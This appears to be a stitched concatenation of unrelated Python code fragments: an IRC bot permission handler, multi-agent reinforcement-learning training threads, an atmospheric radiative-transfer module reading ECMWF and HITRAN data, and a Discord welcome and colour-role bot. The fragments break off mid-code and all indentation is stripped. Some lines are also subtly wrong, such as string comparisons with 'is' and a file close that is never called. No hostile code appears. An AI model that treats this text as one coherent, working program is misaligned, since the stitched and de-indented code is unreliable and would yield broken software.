self.say(chan, "Permission not found")
@irc_network_permission_required('bot_admin')
def unassign_room_perms(self, regex, chan, nick, **kwargs):
room = regex.group('room')
username = regex.group('username').lower()
try:
user = User.objects.get(username__iexact = username)
except User.DoesNotExist:
self.say(chan, "Unknown user")
return
permission = regex.group('perm')
perm_obj = None
for perm, desc in | |
import threading, queue, time, os, pickle
# from queue import Queue
import numpy as np
import tensorflow as tf
import sarnet_td3.common.tf_util as U
from tensorflow.python.keras.backend import set_session
lock = threading.Lock()
class MultiTrainTD3(threading.Thread):
def __init__(self, input_queue, output_queue, args=(), kwargs=None):
threading.Thread.__init__(self, args=(), kwargs=None)
self.input_queue = input_queue
self.output_queue = output_queue
self.daemon = True
self.trainers = args[0]
self.args = args[1]
self.buffer_op = args[2]
self.num_env = args[3]
self.sess = args[4]
self.num_agents = args[5]
self.num_adversaries = args[6]
self.ep_rewards = [[0.0] for _ in range(self.num_env)]
self.ep_end_rewards = [[0.0] for _ in range(self.num_env)]
self.ep_success = [[0.0] for _ in range(self.num_env)]
self.agent_rewards = [[[0.0] for _ in range(self.num_agents)] for _ in range(self.num_env)]
self.agent_info = [[[[]] for i in range(self.num_agents)] for _ in range(self.num_env)]
# self.agent_info = [[[[]]] for _ in range(self.num_env)]
self.final_ep_rewards = [] # Shape: (batch, #) sum of rewards for training curve
self.final_ep_end_rewards = []
self.final_ep_ag_rewards = [] # agent rewards for training curve
self.save_rate = self.args.max_episode_len * 100
self.save_n_ep = self.num_env * 10
self.print_step = -int(self.save_n_ep / self.num_env)
self.q_h_init = np.zeros(shape=(self.num_env, self.args.critic_units))
self.mem_init = np.zeros(shape=(self.num_env, self.args.value_units))
self.time_prev = time.time()
def run(self):
# print(threading.currentThread().getName(), self.receive_messages)
with self.sess.as_default():
# Freeze graph to avoid memory leaks
# self.sess.graph.finalize()
while True:
try:
action, p_index, data = self.input_queue.get()
if action is "None": # If you send `None`, the thread will exit.
return
elif action is "get_action":
out = self.get_action(data, p_index)
self.output_queue.put(out)
elif action is "get_qdebug":
out = self.get_qdebug(data, p_index)
self.output_queue.put(out)
elif action is "get_loss":
out = self.get_loss(data, p_index)
self.output_queue.put(out)
elif action is "write_tboard":
self.write_tboard(data)
elif action is "add_to_buffer":
self.buffer_op.collect_exp(data)
elif action is "save_rew_info":
self.save_rew_info(data)
elif action is "save_benchmark":
out = self.save_benchmark(data)
self.output_queue.put(out)
elif action is "reset_rew_info":
self.reset_rew_info()
elif action is "save_model_rew":
if not (self.args.benchmark or self.args.display):
self.save_model(data)
self.plot_rewards(data)
except queue.Empty:
continue
def get_action(self, data, p_index):
with lock:
agent = self.trainers[p_index]
obs_n_t, h_n_t, c_n_t, mem_n_t, q1_h_t, is_train = data
obs_n_t = np.stack(obs_n_t, axis=-2) # This returns [agent, batch, dim]
obs_n_t = np.expand_dims(obs_n_t, axis=1) # This adds [agent, time, batch, dim]
p_input_j = agent.prep_input(obs_n_t, h_n_t, c_n_t, mem_n_t, q1_h_t[p_index], is_train)
# print(np.shape(obs_n_t))
act_j_t, state_j_t1, mem_j_t1, attn_j_t = agent.action(p_input_j, is_train)
if self.args.encoder_model == "LSTM" or self.args.encoder_model != "DDPG":
c_j_t1, h_j_t1 = state_j_t1
else:
h_j_t1 = state_j_t1
c_j_t1 = state_j_t1
if agent.comm_type in {"DDPG", "COMMNET", "IC3NET"}:
mem_j_t1 = np.zeros(shape=(self.num_env, self.args.value_units))
return act_j_t, h_j_t1, c_j_t1, mem_j_t1, attn_j_t
def get_qdebug(self, data, p_index):
with lock:
# with sess.as_default():
agent = self.trainers[p_index]
obs_n_t, action_n_t, q1_h_n_t, q2_h_n_t = data
obs_n_t = np.stack(obs_n_t, axis=-2) # This returns [agent, batch, dim]
obs_n_t = np.expand_dims(obs_n_t, axis=1) # This adds [agent, time, batch, dim]
q1_j_input = agent.prep_q_input(obs_n_t, action_n_t, q1_h_n_t[p_index])
_, q1_h_j_t1 = agent.q1_debug['q_values'](*(q1_j_input))
if self.args.td3:
q2_input = agent.prep_q_input(obs_n_t, action_n_t, q2_h_n_t[p_index])
_, q2_h_j_t1 = agent.q2_debug['q_values'](*(q2_input))
else:
q2_h_j_t1 = []
return q1_h_j_t1, q2_h_j_t1
def get_loss(self, data, p_index):
with lock:
# with sess.as_default():
agent = self.trainers[p_index]
train_step = data
loss = agent.update(self.trainers, self.buffer_op, train_step)
return loss
def write_tboard(self, data):
with lock:
loss, train_step, writer, summary_ops, summary_vars, num_agents = data
# Tensorboard
episode_b_rewards = []
for j in range(self.num_env):
if self.args.env_type == "mpe":
episode_b_rewards.append(np.mean(self.ep_rewards[j][self.print_step:]))
else:
episode_b_rewards.append(np.mean(self.ep_success[j][self.print_step:]))
episode_b_rewards = np.mean(np.array(episode_b_rewards))
num_steps = train_step * self.num_env
# Add to tensorboard only when actor agent is updated
if loss[0][1] is not None:
fd = {}
for i, key in enumerate(summary_vars):
if i == 0:
fd[key] = episode_b_rewards
else:
agnt_idx = int((i - 1) / 5)
if agnt_idx == num_agents: agnt_idx -= 1
if loss[agnt_idx] is not None:
fd[key] = loss[agnt_idx][int((i - 1) % 5)]
summary_str = U.get_session().run(summary_ops, feed_dict=fd)
writer.add_summary(summary_str, num_steps)
writer.flush()
def save_rew_info(self, data):
with lock:
rew_n, info_n, ep_step = data
# rew_n (num_env, num_agents)
if self.args.env_type == "mpe":
for j in range(self.num_env):
for i, rew in enumerate(rew_n[j]):
if ep_step >= self.args.max_episode_len - 10: # Compute only last 10 episode step rewards
self.ep_end_rewards[j][-1] += rew
self.ep_rewards[j][-1] += rew
self.agent_rewards[j][i][-1] += rew
elif self.args.env_type == "ic3net":
for j in range(self.num_env):
self.ep_success[j][-1] += info_n[j]
if self.args.benchmark and self.args.env_type == "mpe":
for j in range(self.num_env):
for i, info in enumerate(info_n[j]):
self.agent_info[j][i][-1].append(info)
def reset_rew_info(self):
with lock:
for j in range(self.num_env):
self.ep_rewards[j].append(0)
self.ep_success[j].append(0)
self.ep_end_rewards[j].append(0)
for i in range(self.num_agents):
self.agent_rewards[j][i].append(0)
if self.args.benchmark:
for j in range(self.num_env):
for i in range(self.num_agents):
self.agent_info[j][i].append([[]])
def save_benchmark(self, data):
with lock:
exp_name, exp_itr = data
benchmark_dir = os.path.join('./exp_data', exp_name, exp_itr, self.args.benchmark_dir)
if not os.path.exists(benchmark_dir):
os.mkdir(benchmark_dir)
file_name = './exp_data/' + exp_name + '/' + exp_itr + '/' + self.args.benchmark_dir + '/' + exp_name + '.pkl'
print('Finished benchmarking, now saving...')
# pickle_info = [self.agent_info[j] for j in range(self.num_env)]
with open(file_name, 'wb') as fp:
# Dump files as [num_env, [# agents, [#ep, [#stps, [dim]]]]
pickle.dump(self.agent_info, fp)
return "bench_saved"
def save_model(self, data):
with lock:
# train_step = t_step * num_env
train_step, num_episodes, time_taken, exp_name, exp_itr, data_file, saver = data
# Policy File
if num_episodes % (self.save_n_ep) == 0:
save_dir = './exp_data/' + exp_name + '/' + exp_itr + '/' + self.args.save_dir + str(train_step)
U.save_state(save_dir, self.sess, saver=saver)
# episode_rewards, agent_rewards, final_ep_rewards, final_ep_ag_rewards = rewards
if self.args.env_type == "mpe":
# print statement depends on whether or not there are adversaries
if self.num_adversaries == 0:
episode_b_rewards = []
ep_end_b_rewards = []
ep_ag_b_rewards = []
for j in range(self.num_env):
episode_b_rewards.append(np.mean(self.ep_rewards[j][self.print_step:]))
ep_end_b_rewards.append(np.mean(self.ep_end_rewards[j][self.print_step:]))
episode_b_rewards = np.mean(np.array(episode_b_rewards))
ep_end_b_rewards = np.mean(ep_end_b_rewards) / 10.
for i in range(self.num_agents):
temp_ag_reward = []
for j in range(self.num_env):
temp_ag_reward.append(np.mean(self.agent_rewards[j][i][self.print_step:]))
ep_ag_b_rewards.append(np.mean(np.array(temp_ag_reward)))
print("steps: {}, episodes: {}, mean episode reward: {}, mean end rewards: {}, time: {}".format(
train_step, num_episodes, episode_b_rewards, ep_end_b_rewards, round(time.time() - self.time_prev, 3)))
with open(data_file, "a+") as f:
f.write("\n" + "steps: {}, episodes: {}, mean episode reward: {}, mean end rewards: {}, time: {}".format(
train_step, num_episodes, episode_b_rewards, ep_end_b_rewards, round(time.time() - self.time_prev, 3)) + "\n")
else:
episode_b_rewards = []
ep_end_b_rewards = []
ep_ag_b_rewards = []
for j in range(self.num_env):
episode_b_rewards.append(np.mean(self.ep_rewards[j][self.print_step:]))
ep_end_b_rewards.append(np.mean(self.ep_end_rewards[j][self.print_step:]))
episode_b_rewards = np.mean(np.array(episode_b_rewards))
ep_end_b_rewards = np.mean(ep_end_b_rewards)
for i in range(self.num_agents):
temp_ag_reward = []
for j in range(self.num_env):
temp_ag_reward.append(np.mean(self.agent_rewards[j][i][self.print_step:]))
ep_ag_b_rewards.append(np.mean(np.array(temp_ag_reward)))
print("steps: {}, episodes: {}, mean episode reward: {}, mean end rewards: {}, agent episode reward: {}, time: {}".format(
train_step, num_episodes, episode_b_rewards, ep_end_b_rewards, [rew for rew in ep_ag_b_rewards],
round(time.time() - self.time_prev, 3)) + "\n")
with open(data_file, "a+") as f:
f.write("\n" + "steps: {}, episodes: {}, mean episode reward: {}, mean end rewards: {}, agent episode reward: {}, time: {}".format(
train_step, num_episodes, episode_b_rewards, ep_end_b_rewards, [rew for rew in ep_ag_b_rewards],
round(time.time() - self.time_prev, 3)) + "\n")
# Keep track of final episode reward
self.final_ep_rewards.append(episode_b_rewards)
self.final_ep_end_rewards.append(ep_end_b_rewards)
for rew in ep_ag_b_rewards:
self.final_ep_ag_rewards.append(rew)
self.time_prev = time.time()
def plot_rewards(self, data):
with lock:
train_step, num_episodes, t_start, exp_name, exp_itr, data_file, saver = data
plot_dir = os.path.join('./exp_data', exp_name, exp_itr, self.args.plots_dir)
if not os.path.exists(plot_dir):
os.mkdir(plot_dir)
rew_file_name = './exp_data/' + exp_name + '/' + exp_itr + '/' + self.args.plots_dir + '/' + exp_name + '_rewards.pkl'
with open(rew_file_name, 'wb') as fp:
pickle.dump(self.final_ep_rewards, fp)
rew_ep_end_file_name = './exp_data/' + exp_name + '/' + exp_itr + '/' + self.args.plots_dir + '/' + exp_name + '_rewards_ep_end.pkl'
with open(rew_ep_end_file_name, 'wb') as fp:
pickle.dump(self.final_ep_end_rewards, fp)
agrew_file_name = './exp_data/' + exp_name + '/' + exp_itr + '/' + self.args.plots_dir + '/' + exp_name + '_agrewards.pkl'
with open(agrew_file_name, 'wb') as fp:
pickle.dump(self.final_ep_ag_rewards, fp)
"""
REINFORCE Threads
"""
class MultiTrainVPG(threading.Thread):
def __init__(self, input_queue, output_queue, args=(), kwargs=None):
threading.Thread.__init__(self, args=(), kwargs=None)
self.input_queue = input_queue
self.output_queue = output_queue
self.daemon = True
self.trainers = args[0]
self.args = args[1]
self.buffer_op = args[2]
self.num_env = args[3]
self.sess = args[4]
self.num_agents = args[5]
self.num_adversaries = args[6]
self.ep_rewards = [[0.0] for _ in range(self.num_env)]
self.ep_success = [[0.0] for _ in range(self.num_env)]
self.agent_rewards = [[[0.0] for _ in range(self.num_agents)] for _ in range(self.num_env)]
self.agent_info = [[[[]]] for _ in range(self.num_env)]
self.final_ep_rewards = [] # Shape: (batch, #) sum of rewards for training curve
self.final_ep_ag_rewards = [] # agent rewards for training curve
self.save_rate = self.args.max_episode_len * 100
if self.args.env_type == "mpe":
self.print_step = -int(self.save_rate / self.num_env)
else: # print for episode end only (success rate)
self.print_step = -int(self.save_rate / (self.num_env * self.args.max_episode_len))
self.q_h_init = np.zeros(shape=(self.num_env, self.args.critic_units))
self.mem_init = np.zeros(shape=(self.num_env, self.args.value_units))
self.time_prev = time.time()
def run(self):
# print(threading.currentThread().getName(), self.receive_messages)
with self.sess.as_default():
# Freeze graph to avoid memory leaks
# self.sess.graph.finalize()
while True:
try:
action, p_index, data = self.input_queue.get()
if action is "None": # If | |
press_in[press_in.size - 1] < self.atmo["psurf"]:
# extrapolation required
dz = (
np.log(self.atmo["psurf"] / press_in[press_in.size - 1])
* Rgas
* temp_in[temp_in.size - 1]
/ (grav * Mair)
)
press_in = np.append(press_in, self.atmo["psurf"])
zalt_in = np.append(zalt_in - dz, 0.0)
temp_in = np.append(temp_in, temp_in[temp_in.size - 1])
air_in = np.append(
air_in,
press_in[press_in.size - 1]
* Avog
* 1.0e-4
/ (Rgas * temp_in[temp_in.size - 1]),
)
o3_in = np.append(o3_in, o3_in[o3_in.size - 1])
o2_in = np.append(o2_in, o2_in[o2_in.size - 1])
h2o_in = np.append(h2o_in, h2o_in[h2o_in.size - 1])
co2_in = np.append(co2_in, co2_in[co2_in.size - 1])
no2_in = np.append(no2_in, no2_in[no2_in.size - 1])
nlev_in = nlev_in - 1
elif press_in[press_in.size - 1] > self.atmo["psurf"]:
# interpolation required
intv = np.searchsorted(
press_in, self.atmo["psurf"]
) # self.atmo['psurf'] is in the interval [press_in[intv], press_in[intv-1]]
press_in = np.append(press_in[0:intv], self.atmo["psurf"])
temp_in = temp_in[0 : intv + 1]
air_in = np.append(
air_in[0:intv],
press_in[press_in.size - 1]
* Avog
* 1.0e-4
/ (Rgas * temp_in[temp_in.size - 1]),
)
o3_in = o3_in[0 : intv + 1]
o2_in = o2_in[0 : intv + 1]
h2o_in = h2o_in[0 : intv + 1]
co2_in = co2_in[0 : intv + 1]
no2_in = no2_in[0 : intv + 1]
zalt_in = zalt_in[0 : intv + 1]
dz = (
np.log(press_in[press_in.size - 1] / press_in[press_in.size - 2])
* Rgas
* temp_in[temp_in.size - 1]
/ (grav * Mair)
)
zalt_in = np.append(zalt_in[0:intv] - zalt_in[intv - 1] + dz, 0)
# Interpolate temperature [K] on output layers
# Flip arrays because our heights are descending
# (from top to bottom), while np.interp expects ascending order
self.atmo["tlev"] = np.flip(
np.interp(np.flip(self.atmo["zlev"]), np.flip(zalt_in), np.flip(temp_in))
)
self.atmo["tlay"] = np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(temp_in))
)
# Calculate pressure [hPa] on output levels and layers
self.atmo["plev"] = np.flip(
np.interp(np.flip(self.atmo["zlev"]), np.flip(zalt_in), np.flip(press_in))
)
self.atmo["play"] = np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(press_in))
)
# Calculate the vertical column of air above pressure level
# and use this to calculate the partial vertical air columns per layer [#/m^2].
# Partial columns have the advantage that multiplication with cross sections
# yields optical depth.
nlev = len(self.atmo["zlev"])
sp = (
NA / (MDRYAIR * g0) * 1.0e2
) # [#/m^2 * 1/hPa] air column above P is P*NA/Mair/g from p = m*g/area
vc_air = sp * self.atmo["plev"] # air column [#/m^2] above pressure level
self.atmo["AIR"] = vc_air[1:nlev] - vc_air[0 : nlev - 1] # [#/m^2]
self.atmo["AIR"][0] = vc_air[
0
] # [#/m^2] uppermost layer extends to infinity in terms of number of molecules
# Interpolate mole fractions on output height grid
# and then calculate partial columns per layer [#/m^2]
# ozone
self.atmo["O3"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(o3_in))
)
* self.atmo["AIR"]
)
# water vapor
self.atmo["H2O"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(h2o_in))
)
* self.atmo["AIR"]
)
# co2
self.atmo["CO2"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(co2_in))
)
* self.atmo["AIR"]
)
# no2
self.atmo["NO2"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(zalt_in), np.flip(no2_in))
)
* self.atmo["AIR"]
)
# o2 use a constant mixing ratio
self.atmo["O2"] = XO2 * self.atmo["AIR"]
self.atmo["CH4"] = XCH4 * self.atmo["AIR"]
###########################################################
def get_data_ECMWF_ads_egg4(self, filename, month, longitude, latitude):
"""
# Read atmospheric data provided by ECMWF ADS EGG4 run:
# https://ads.atmosphere.copernicus.eu/cdsapp#!/dataset/cams-global-ghg-reanalysis-egg4-monthly
#
# Download script:
#
# import cdsapi
# c = cdsapi.Client()
# c.retrieve(
# 'cams-global-ghg-reanalysis-egg4-monthly',
# {
# 'variable': [
# 'carbon_dioxide', 'geopotential', 'methane',
# 'relative_humidity', 'temperature',
# ],
# 'pressure_level': [
# '1', '2', '3',
# '5', '7', '10',
# '20', '30', '50',
# '70', '100', '150',
# '200', '250', '300',
# '400', '500', '600',
# '700', '800', '850',
# '900', '925', '950',
# '1000',
# ],
# 'year': '2016',
# 'month': [
# '01', '02', '03',
# '04', '05', '06',
# '07', '08', '09',
# '10', '11', '12',
# ],
# 'product_type': 'monthly_mean',
# 'format': 'netcdf',
# },
# 'download.nc'
#
# arguments:
# filename: filepath to ECMWF netcdf file
# month: [01 ... 12]
# longitude [0 ... 360 degree]
# latitude [-90 ... 90 degree]
# returns:
# temp: temperature profile [nlay] [K]
# plev: pressure level profile [nlev] [hPa]
# atmo[tlev]: temperature level profile [nlev] [K]
# atmo[tlay]: temperature layer profile [nlev] [K]
# atmo[plev]: pressure level profile [nlev] [hPa]
# atmo[play]: pressure layer profile [nlay] [hPa]
# atmo[AIR]: air partial column profile [nlay] [#/m^2]
# atmo[H2O]: h2o partial column profile [nlay] [#/m^2]
# atmo[CO2]: co2 partial column profile [nlay] [#/m^2]
# atmo[CH4]: no2 partial column profile [nlay] [#/m^2]
# atmo[O2]: o2 partial column profile [nlay] [#/m^2]
"""
# check whether input is in range
while True:
if (
os.path.exists(filename)
and 1 <= month <= 12
and -90.0 <= latitude <= 90.0
and 0.0 <= longitude <= 360.0
):
break
elif not os.path.exists(filename):
print("ERROR! read_ecmwf_ads_egg4: filename does not exist.")
raise StopExecution
else:
print("ERROR! read_ecmwf_ads_egg4: input out of range.")
raise StopExecution
# Open netcdf file
ds = nc.Dataset(filename)
# print(ds.variables)
# Select month index, latitude/longitude index (next neighbour)
itime = int(month - 1)
ilat = np.argmin(abs(ds["latitude"][:] - latitude))
ilon = np.argmin(abs(ds["longitude"][:] - longitude))
# ECMWF: Geopotential [m2 s-2] converted to height [m], approximate use of g0
z_in = np.array([d / g0 for d in ds["z"][itime, :, ilat, ilon]])
nlev_in = z_in.size
# ECMWF: Pressure [hPa]
p_in = ds["level"][:]
# ECMWF: Temperature [K]
temp_in = ds["t"][itime, :, ilat, ilon]
# ECMWF: Humidity [%] converted to water vapor mole fraction [mol/mol] via Clausius-Clapeyron equation
pS = [clausius_clapeyron(Ti) for Ti in temp_in]
# ECMWF: Mole fraction is partial pressure over dry total pressure, partial pressure is rel. hum. * sat. vapor pressure
h2o_in = np.array(
[
d / 100.0 * pSi / (pi - d / 100.0 * pSi)
for d, pSi, pi in zip(ds["r"][itime, :, ilat, ilon], pS, p_in)
]
)
# ECMWF: Carbon dioxide mass mixing ratio [kg kg-1] converted to mole fraction [mol/mol]
co2_in = np.array([d / MCO2 * MDRYAIR for d in ds["co2"][itime, :, ilat, ilon]])
# ECMWF: Methane mass mixing ratio [kg kg-1] converted to mole fraction [mol/mol]
ch4_in = np.array([d / MCH4 * MDRYAIR for d in ds["ch4"][itime, :, ilat, ilon]])
ds.close
# Interpolate temperature [K] on output layers
# Flip arrays because our heights are descending
# (from top to bottom), while np.interp expects ascending order
self.atmo["tlay"] = np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(z_in), np.flip(temp_in))
)
self.atmo["tlev"] = np.flip(
np.interp(np.flip(self.atmo["zlev"]), np.flip(z_in), np.flip(temp_in))
)
# Calculate pressure [hPa]
self.atmo["play"] = np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(z_in), np.flip(p_in))
)
self.atmo["plev"] = np.flip(
np.interp(np.flip(self.atmo["zlev"]), np.flip(z_in), np.flip(p_in))
)
# Calculate the vertical column of air above pressure level
# and use this to calculate the partial vertical air columns per layer [#/m^2].
# Partial columns have the advantage that multiplication with cross sections
# yields optical depth.
nlev = len(self.zlev)
sp = (
NA / (MDRYAIR * g0) * 1.0e2
) # [#/m^2 * 1/hPa] air column above P is P*NA/Mair/g from p = m*g/area
vc_air = sp * self.atmo["plev"] # air column [#/m^2] above pressure level
self.atmo["AIR"] = vc_air[1:nlev] - vc_air[0 : nlev - 1] # [#/m^2]
self.atmo["AIR"][0] = vc_air[
0
] # [#/m^2] uppermost layer extends to infinity in terms of number of molecules
# Interpolate mole fractions on output height grid
# and then calculate partial columns per layer [#/m^2]
# water vapor
self.atmo["H2O"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(z_in), np.flip(h2o_in))
)
* self.atmo["AIR"]
)
# co2
self.atmo["CO2"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(z_in), np.flip(co2_in))
)
* self.atmo["AIR"]
)
# no2
self.atmo["CH4"] = (
np.flip(
np.interp(np.flip(self.atmo["zlay"]), np.flip(z_in), np.flip(ch4_in))
)
* self.atmo["AIR"]
)
# o2 use a constant mixing ratio
self.atmo["O2"] = XO2 * self.atmo["AIR"]
###########################################################
class molecular_data:
"""
# The molecular_data class collects method for calculating
# the absorption cross sections of molecular absorbers
#
# CONTAINS
# method __init__(self,wave)
# method get_data_HITRAN(self,xsdbpath, hp_ids)
"""
###########################################################
def __init__(self, wave):
"""
# init class
#
# arguments:
# wave: array of wavelengths [wavelength] [nm]
# xsdb: dictionary with cross section data
"""
self.xsdb = {}
self.wave = wave
###########################################################
def get_data_HITRAN(self, xsdbpath, hp_ids):
"""
# Download line parameters from HITRAN web ressource via
# the | |
### TNM-chan ###
### v 21.220 ###
### BEGIN USER-SET VARIABLES ###
# Set your command prefix here.
pre = 'tnm!'
# If you say "colour" instead of "color," change this variable to "True", and I'll change everything accordingly.
useColour = False
# Type your Discord username in quotes, then add your user ID - make sure these are right, because I send both on occasion!
sysop = ''
soID = int()
# Before launching the bot, take note of any moderators that have access to all rooms, and copy their IDs into this list (separated by commas).
opIDs = [
]
# If you want specific server name formatting, add it in surrounded by either 's or "s.
snFormat = ''
# Type your open room names into this list (separated by commas), surrounded by either 's or "s.
openRooms = [
'lobby',
'entroom'
]
# Choose whether or not you'll use debug commands. If you are, type your debug room's name here.
useDebug = True # Make sure this is a boolean ("True" or "False")!
debugSet = 'bot-debug'
# This is your server's color library. Set some color values here and give them names. Here are the ones in the official server.
colorset = {
hex(0xff0000): 'red',
hex(0xe67e22): 'orange',
hex(0xffff00): 'yellow',
hex(0x00ff00): 'green',
hex(0x00ffff): 'teal',
hex(0x0080ff): 'blue',
hex(0x0000ff): 'indigo',
hex(0x9b59b6): 'purple',
hex(0xff00ff): 'magenta',
hex(0xff98ff): 'pink',
hex(0xffffff): 'white',
hex(0x010101): 'black',
### END USER-SET VARIABLES ###
hex(0x000000): 'tooblack', # Don't mess with this entry, it's important! If I try to give the role a pure black color, Discord will replace it with a generic color, which we don't want.
}
# First, I'll import/load libraries.
import traceback
import os
import shelve
import asyncio
from random import choice
### Make sure you've got these modules installed! ###
import termcolor
from dotenv import load_dotenv
import discord
from discord.ext import commands
from discord_components import DiscordComponents, Button, ButtonStyle
# Due to a Discord...thing, I need to set intents now. Thanks, Discord.
intents = discord.Intents.all()
# Next, I'll define some subroutines.
def getKey(vin): # This is for finding a specific value in a color library.
for key, value in colorset.items():
if vin == value:
return key
raise KeyError()
# Now, the token specified in the .env is used to get in to Discord's APIs.
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
if snFormat: # If you set a name for me to use, I'll use that.
serverName = snFormat
else:
serverName = os.getenv('DISCORD_GUILD')
# I'm setting my command prefix.
bot = commands.Bot(command_prefix=str(pre), intents=intents)
# I'll remove the default "help" command so I can use my own.
bot.remove_command('help')
# Here's some information regarding termcolor.
def Information(skk): print("\033[97m {}\033[00m" .format(skk)) # Gray
def Success(skk): print("\033[92m {}\033[00m" .format(skk)) # Green
def UserErr(skk): print("\033[93m {}\033[00m" .format(skk)) # Yellow
def SysErr(skk): print("\033[91m {}\033[00m" .format(skk)) # Red
def Permission(skk): print("\033[95m {}\033[00m" .format(skk)) # Purple
def Intent(skk): print("\033[34m {}\033[00m" .format(skk)) # Blue
def Conversion(skk): print("\033[96m {}\033[00m" .format(skk)) # Cyan
# I'll define some constant variables here, as well as a couple more subroutines.
firstConnect = True
overwrite = discord.PermissionOverwrite()
overwrite.send_messages=True
overwrite.read_messages=True
if useColour:
clr = 'colour'
else:
clr = 'color'
# Here's how I set my status!~
async def setStatus(type=''):
if type == "busy":
await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.playing, name='with variables'), status=discord.Status.do_not_disturb)
elif type == "color":
await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.playing, name='with colors'), status=discord.Status.idle)
else:
await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name='for "tnm!list"'), status=discord.Status.online)
async def sendDebug(contents):
if useDebug:
if firstConnect: # Only here so Rare doesn't have a panic attack. And also to shrink the on_ready function.
de = [a for a in bot.get_all_channels() if a.name == debugSet]
debug = de[0]
try:
await debug.send(contents)
except (UnboundLocalError, AttributeError): # If my debug channel variable ever breaks, this will help me reassign it!
de = [a for a in bot.get_all_channels() if a.name == debugSet]
debug = de[0]
await debug.send(contents)
else:
pass
# Fancy embed generator time!~
def generateEmbed(clr=0x03FFED,title='[title]',desc='',f1e=0,f1t='[f1t]',f1c='[f1c]',f2e=0,f2t='[f2t]',f2c='[f2c]',f3e=0,f3t='[f3t]',f3c='[f3c]'):
global embedVal
embedVal = discord.Embed(
title=title, description=desc, color=clr
)
if f1e:
embedVal.add_field(name=f1t, value=f1c, inline=False)
if f2e:
embedVal.add_field(name=f2t, value=f2c, inline=False)
if f3e:
embedVal.add_field(name=f3t, value=f3c, inline=False)
return embedVal
# Setting the standard DM messages now, since we couldn't before.
def defaultEmbeds(type, user):
if type == 'welcome':
embedVal = generateEmbed(
title=":tada: **Hi, " + str(user) + "! Welcome to " + str(serverName) + "!**",
desc="I'm TNM-chan, your android assistant.\n",
f1e=1,
f1t=" You might not know what to do at first, but don't panic!",
f1c="DM me with `tnm!list`, and I'll send a list of commands your way!")
elif type == 'welcome_dm':
embedVal = generateEmbed(
title=":tada::grey_exclamation: **Hi, " + str(user) + "! Welcome to " + str(serverName) + "!**",
desc="You're seeing this message because you've disabled direct messages from other server members.\n",
f1e=1,
f1t="I send important messages through DMs, specifically if something goes wrong when you use a command.",
f1c="With that being said, it'd be nice if you could enable DMs from server members, that way I can DM you if something happens. (Don't worry, we won't let anyone spam you!)")
elif type == 'dmerror':
embedVal = generateEmbed(
title=":grey_exclamation: **Hey, " + str(user) + "!**",
desc="I'm sure you know this already, but you've disabled direct messages from other server members.\n",
f1e=1,
f1t="I send important messages through DMs, specifically if something goes wrong with your command.",
f1c="With that being said, it'd be nice if you could enable DMs from server members, that way I can DM you if something happens. (Don't worry, we won't let anyone spam you!)")
else:
return
return embedVal
# Now I'm ready, so I'll let you know!
Success('I\'m ready to go!')
# If all went well, I'll send a message to the terminal!
@bot.event
async def on_ready():
DiscordComponents(bot)
global firstConnect
global opMention
global debug
if firstConnect:
# Setting up sysop mentions.
opMention = await bot.fetch_user(int(soID))
await sendDebug(':green_circle: Connected.')
Conversion('I\'ve connected to the server!\n')
firstConnect = False
else:
await sendDebug(':blue_circle: Reconnected.')
Conversion('I got disconnected, but I\'m back online!\n')
await setStatus()
# Here's how I welcome new users, and get them into #lobby-f1!
@bot.event
async def on_member_join(ctx):
Intent('Hey! ' + str(ctx) + ' just joined the server.')
await sendDebug(':new: ' + str(ctx) + ' just joined the server!')
await setStatus("busy")
room = [a for a in bot.get_all_channels() if a.name == 'lobby-f1']
await room[0].set_permissions(ctx, overwrite=overwrite)
Information('They now have access to #lobby-f1...')
await sendDebug('Access to #lobby-f1 has been provided...')
try:
embedVal = defaultEmbeds('welcome', ctx.mention)
await ctx.send(embed=embedVal)
Information('...and the welcome DM\'s been sent.')
await sendDebug('...and the welcome DM has just been sent.')
except discord.Forbidden:
embedVal = defaultEmbeds('welcome_dm', ctx.mention)
await room[0].send(embed=embedVal)
UserErr('and I\'ve asked them to enable DMs from server members. Try to make sure they actually do this... ')
await sendDebug('...and I couldn\'t send the welcome DM, so I just sent a message in lobby-f1.')
Success('All set!\n')
await setStatus()
await sendDebug('All set!\n--')
### Okay, here's my commands!
### CORE COMMANDS
## This command allows a user to select a color; after which, I'll assign a role based on said color. Thanks, Color-senpai!~
@bot.command(name='color',aliases=['colour'])
async def color(ctx, hx = '[none]'):
Information(str(ctx.message.author) + ' wants to change their color to ' + str(hx) + '.\n')
await sendDebug(':art: ' + str(ctx.message.author) + ' wants to change their color to ' + str(hx) + '.')
# I need to make sure this was sent in the server.
if not ctx.guild:
# If not, I won't have any idea what to do, so I'll stop the command here and let them know.
UserErr('The command was sent in DMs, so context can\'t be found.')
await sendDebug(':grey_exclamation: The command was sent in DMs, so context can\'t be found. Command halted.\n--')
try:
UserErr(str(ctx.message.author) + ' tried to change their color, but sent the command in DMs and not in the server.\n')
embedVal = generateEmbed(clr=0xffcc00,title=":warning: **That didn't work...**",desc="An error occurred while processing your command.\n",f1e=1,f1t="**Problem:** You tried to set or change your " + str(clr) + ", but sent the command in DMs and not the server.",f1c="As much as I want to, I can't do much if you're not in the server...\n",f2e=1,f2t="**Solution:** Try running the command again, but in the server.",f2c="(Maybe one day, I can do all this cool stuff from in here. One day...)")
await ctx.send(embed=embedVal)
return
except discord.Forbidden:
return
# Otherwise, I'll start the command!
else:
await setStatus("color")
await ctx.message.delete()
name = ctx.message.author
sv = ctx.guild
dmerror = defaultEmbeds('dmerror', name)
# If hx isn't found, I'll assume the user needs help.
if hx == '[none]':
await sendDebug(':grey_exclamation: No | |
% len(merged_unreleased_indexes))
